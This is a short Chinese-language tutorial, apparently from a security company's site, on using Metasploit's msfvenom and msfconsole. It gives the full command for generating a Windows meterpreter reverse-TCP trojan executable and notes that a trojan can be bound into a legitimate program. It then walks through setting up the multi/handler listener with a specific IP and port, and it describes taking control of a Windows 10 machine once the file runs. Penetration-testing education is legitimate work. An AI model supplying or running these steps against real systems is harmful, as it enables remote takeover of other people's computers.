今天给大家讲解一下Metasploit的用法
msfvenom常用命令
-p是选择一个Payload
-o是输入的地址(绝对路径)
-f是输入的格式
-l是载荷列表
-i是编码次数
-b是在生成的程序中避免出现的值
-x允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上
LHOST后面跟上Kali Linux的IP地址
LPORT后面是监听的端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f exe -o hacker.exe
运行截图:
生成的恶意文件在Kali Linux的home/hacker.exe
运行Msfconsole设置参数:
msfconsole运行MSF的控制台:
选择模块:
useexploit/multi/handler
设置参数、端口、IP
set PAYLOAD windows/meterpreter/reverse_tcp
show options查看设置状态
set LHOST 192.168.0.11
set LPORT 5555
设置截图
全部参数设置好以后,直接运行:exploit
Windows 10运行刚刚生成的木马:
这个时候Metasploit获取到了一个会话:
这个时候就拿到了Windows10的电脑权限!
结尾
苏公网安备 32132202001088号
| Copyright 北极熊 北格技术 版权所有